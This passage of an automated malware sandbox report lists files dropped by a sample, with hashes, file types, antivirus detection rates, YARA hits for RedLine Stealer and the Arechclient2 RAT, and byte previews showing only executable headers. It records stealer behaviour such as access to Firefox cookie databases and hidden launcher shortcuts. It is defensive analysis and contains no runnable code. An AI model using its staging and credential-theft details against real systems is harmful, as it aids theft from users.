Preview:	<...>...?...?...>.......+...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{.......\...P...h...P...l...K...Q...M...^...l...K...?...?...?...?...?...?...?...?...?...?...?...\|...V...S...z...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...\|...Z...v...^...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{...c...M...Y..z...M...H...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...I...........?...?...?...?...?...?...?...?...?...?...

C:\Users\user\AppData\Local\Temp\7a23b9ff

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.761449383442233
Encrypted:	false
SSDEEP:	24576:DoSKVXfYCLaLoFG+evn0wq+epoIpibue6yJiK4BI/9zUUQu/Mxu4UytemKDxguk9:DoSKRBaLXls0Ipibue6yJiK4BI/9zUU6
MD5:	C2B368082A22D638E2D4986A55BCBAB9
SHA1:	059289E5CCBF1DCDA47C68CA4A8599EE5AC3935B
SHA-256:	CB6A1407412BBAF12C3D00CFDF2E031856C48A3D5BB3D1ECC76A11E257E10DE3
SHA-512:	41826B3C11DCB8AFEBE057B7A7604DCF4DDD0FA0EF99AB71479BF13B6A74E87C6D3E90FF50966B2450C093B5AE5B667037ED8664912EA731D4D96B008B0539F9
Malicious:	false
Preview:	<...>...?...?...>.......+...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{.......\...P...h...P...l...K...Q...M...^...l...K...?...?...?...?...?...?...?...?...?...?...?...\|...V...S...z...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...\|...Z...v...^...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.......{...c...M...Y..z...M...H...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...I...........?...?...?...?...?...?...?...?...?...?...

C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21% Antivirus: Virustotal, Detection: 38%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cqecfsbe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 57% Antivirus: Virustotal, Detection: 61%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4296
Entropy (8bit):	5.495524771889749
Encrypted:	false
SSDEEP:	96:Ueuyvyq62zU8wscRBvWP4P4PNPNPNPePePVcuPf6C:N6q62zU8wscRBvWP4P4PNPNPNPePePV5
MD5:	CBE3E153E492885F8AFA9D9D89073ACA
SHA1:	2235D9B25A7DB93F41A115AED859E720A8285ADD
SHA-256:	F4CAB423932DD6895F659B379F7B294E315B99E7269C16A2A43C0175E0A79F69
SHA-512:	755D322796066C3938196D9FA417AE6C153C0783A63D72EA2C4CD057A7285BB1984BE070F6223C300F6CC985510A211CEB309372B8915AA9436951FCCFADB235
Malicious:	false
Preview:	[04/25/24 09:04:06] Main : OS Version = osWin10...[04/25/24 09:04:06] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/25/24 09:04:08] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/25/24 09:04:09] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/25/24 09:04:09] DownloadAndLaunchInstaller : Creating BITS download handler...[04/25/24 09:04:09] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/25/24 09:04:14] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/25/24 09:04:14] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 57% Antivirus: Virustotal, Detection: 61%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\tmp3B62.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u42w.0.exe

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	279040
Entropy (8bit):	5.691181002891515
Encrypted:	false
SSDEEP:	3072:69UdJ5A7opLXtkOUqBvJUVrHnS4AAhbg5ORfpZVNMWEGwe:LtSwDtkOntJURHSn23RRvOcD
MD5:	A0E6719CEB3DC236283AB59B7F39B058
SHA1:	32AF73BD4AFBB1EB7B12026082E60DBE3366793C
SHA-256:	096985879331F9E67FD4BFA6816197610CBFB0F2E8E17D60331D567F4D74056C
SHA-512:	D51E5B2CD6514C9E464C139AD556F0EB83C29DE3EE09E8F0919E90B871DE340DD0A3FF2C0F166A0DEA6F7B3A5DD2922C9696651C2F58D873A63B58ED88B21F57
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 43%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............X...X...X.SX...X.EX...X.BX...X.).X...X...X...X.LX...X.RX...X.WX...XRich...X........PE..L...."Od............................L.............@..........................p..............................................LB..<.......h...............................................................................x............................text............................... ..`.rdata.............................@..@.data...."~..P...(...8..............@....rsrc...h............`..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u42w.1.zip

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3884863
Entropy (8bit):	7.9982714074161665
Encrypted:	true
SSDEEP:	98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
MD5:	78D3CA6355C93C72B494BB6A498BF639
SHA1:	2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
SHA-256:	A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
SHA-512:	1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
Malicious:	false
Preview:	PK.........?.X........I......bunch.dat\]...:.... "...T.......N<wf..X $;.e..)....\|u]+...UV.~.....f.Rje.......@.f.r..V....J-.#U.....=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O..:J%o.......`.f+O...W>.....S.INC.m.6..\|wQ.xk.K.....o.D....:.n4....P>..M._\|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.\|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a......7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.\|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.......Z..5.(....]........

C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18% Antivirus: Virustotal, Detection: 13%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u42w.2\bunch.dat

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Local\Temp\u42w.2\relay.dll

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u42w.2\whale.dbf

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Users\user\AppData\Local\Temp\u42w.3.exe

Download File

Process:	C:\Users\user\Desktop\g77dRQ1Csm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Local\Temp\vks

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Thu Apr 25 06:04:03 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.989393224874837
Encrypted:	false
SSDEEP:	24:85XmCQsfRNgKsdC/rb0yAoZf1Xx2gxbqyFm:84CQoR0RoBd/YyF
MD5:	3DB416DE63CA1B9FFA332807450F6289
SHA1:	7FC21AA109A6444BD24A560E9FEB57DB82159CB1
SHA-256:	8B99A8E9127360C4935CA81632584629FA0C364B56377753735A3CF30D83D5A7
SHA-512:	503849FB88DE4560F5F02296C086EB436BD5E0D19C73D0CFEC3CE55CC6041FB2171C0C77AD3E567B9735A190EC500D29981D679D0E993B4A28B60FFF604AE2C1
Malicious:	false
Preview:	L..................F.... ....Z.!......g.....Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....jz....:.\........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Xy8...........................%..A.p.p.D.a.t.a...B.P.1......Xw8..Local.<......CW.^.Xy8....b.....................VJ..L.o.c.a.l.....N.1......X.8..Temp..:......CW.^.X.8....l......................D .T.e.m.p.....T.1......X.8..u42w.2..>......X.8.X.8....D.........................u.4.2.w...2.....V.2.0.%..X./ .run.exe.@......X./.X.8.............................r.u.n...e.x.e......._...............-.......^.............FX.....C:\Users\user\AppData\Local\Temp\u42w.2\run.exe......\.u.4.2.w...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......813848...........hT..CrF.f4... .7.T..b...,.......hT..CrF.f4... .7.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
